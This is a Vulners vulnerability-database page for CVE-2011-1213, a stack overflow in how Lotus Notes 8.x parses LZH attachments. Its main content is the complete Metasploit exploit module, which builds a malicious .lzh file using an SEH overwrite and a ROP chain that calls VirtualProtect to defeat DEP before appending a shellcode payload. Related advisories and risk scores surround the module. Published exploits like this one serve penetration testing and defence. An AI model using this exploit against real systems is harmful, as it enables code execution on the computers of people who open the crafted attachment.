Vulners
Lucene search
Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)
🗓️ 23 Jun 2011 15:43:54Reported by binaryhouse.net, alino <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 33 Views
| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
 | Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh attachment) | 23 Jun 201100:00 | – | zdt |
 | CVE-2011-1213 | 23 Jun 201100:00 | – | circl |
 | IBM Lotus Notes LZH Attachment Viewer Stack Buffer Overflow (CVE-2011-1213) | 15 Nov 201100:00 | – | checkpoint_advisories |
 | CVE-2011-1213 | 31 May 201120:00 | – | cve |
 | CVE-2011-1213 | 31 May 201120:00 | – | cvelist |
 | Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview ('.lzh' Attachment) (Metasploit) | 23 Jun 201100:00 | – | exploitdb |
 | KLA10202 ACE vulnerabilities in IBM Lotus Notes | 31 May 201100:00 | – | kaspersky |
| Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment) | 23 Jun 201109:51 | – | metasploit |
 | IBM Lotus Notes Attachment Handling Multiple Buffer Overflows | 31 May 201100:00 | – | nessus |
| Symantec Mail Security Autonomy Verity Keyview Filter Vulnerabilities (SYM11-013) | 28 Oct 201100:00 | – | nessus |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)',
'Description' => %q{
This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when
parsing a malformed, specially crafted LZH file. This vulnerability was
discovered binaryhouse.net
},
'License' => MSF_LICENSE,
'Author' =>
[
'binaryhouse.net', # original discovery
'alino <26alino[at]gmail.com>', # Metasploit module
],
'References' =>
[
['CVE', '2011-1213'],
['OSVDB', '72706'],
['BID', '48018'],
['URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904'],
['URL', 'http://www.ibm.com/support/docview.wss?uid=swg21500034'],
],
'Stance' => Msf::Exploit::Stance::Passive,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Platform' => ['win'],
'Targets' =>
[
[ 'Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal',
{
'Offset' => 6741,
'Ret' => 0x780c26b2 # POP ECX; POP ECX; RETN MSVCP60.dll
}
],
[ 'Lotus Notes 8.5.2 FP2 / Windows Universal / DEP',
{
'Offset' => 6745,
'Ret' => 0x60dc1043 # ADD ESP,52C; XOR EAX,EAX; POP EDI; POP ESI; POP EBX; POP EBP; RETN 4 nnotes.dll
}
],
],
'DisclosureDate' => '2011-05-24',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.lzh']),
])
end
def exploit
header = "\x08" # Size of archived file header <-- 8 - 13 = FFFFFFF6
header << "\x1a" # 1 byte Header checksum
header << "-lh0-" # Method ID (No compression)
header << "\x7c\x1a\x00\x00" # Compressed file size
header << "\x7c\x1a\x00\x00" # Uncompressed file size
header << "\xB2\x5e\xab\x3c" # Original file date/time
header << "\x20" # File attribute
header << "\x00" # Level identifier
header << "\x07" # File name length
header << "poc.txt" # File name
header << "\x25\x7d" # 16 bit CRC of the uncompressed file
lzh = header
lzh << rand_text(target['Offset'])
if (target == targets[0])
lzh << generate_seh_record(target.ret)
lzh << make_nops(8)
lzh << payload.encoded
elsif (target == targets[1])
rop_nop = [0x7c3c5958].pack('V') * 47 # RETN MSVCP71.dll
rop_gadgets =
[
0x60524404, # POP EAX; RETN nnotes.dll
0x7c37a140, # VirtualProtect()
0x7c3a4000, # MOV EAX,DWORD PTR DS:[EAX]; RETN MSVCP71.dll
0x603c53c1, # MOV ESI,EAX; RETN nnotes.dll
0x60620001, # POP EBP; RETN nnotes.dll
0x7c3c5946, # PUSH ESP; RETN MSVCP71.dll
0x7c34280f, # POP EBX; RETN MSVCR71.dll
0x00001954, # dwSize
0x780ea001, # POP ECX; RETN MSVCP60.dll
0x7c38b000, # lpflOldProtect
0x60e73200, # POP EDI; RETN nnotes.dll
0x60e73201, # RETN nnotes.dll
0x601d5f02, # POP EDX; RETN nnotes.dll
0x00000040, # flNewProtect
0x60524404, # POP EAX; RETN nnotes.dll
0x90909090, # NOP
0x60820801, # PUSHAD; RETN nnotes.dll
].pack("V*")
lzh << [target.ret].pack('V')
lzh[32, rop_nop.length] = rop_nop
lzh[220, rop_gadgets.length] = rop_gadgets
lzh[289, payload.encoded.length] = payload.encoded
end
print_status("Creating '#{datastore['FILENAME']}' file...")
file_create(lzh)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Oct 2020 20:00Current
0.5Low risk
Vulners AI Score0.5
CVSS 29.3
EPSS0.32961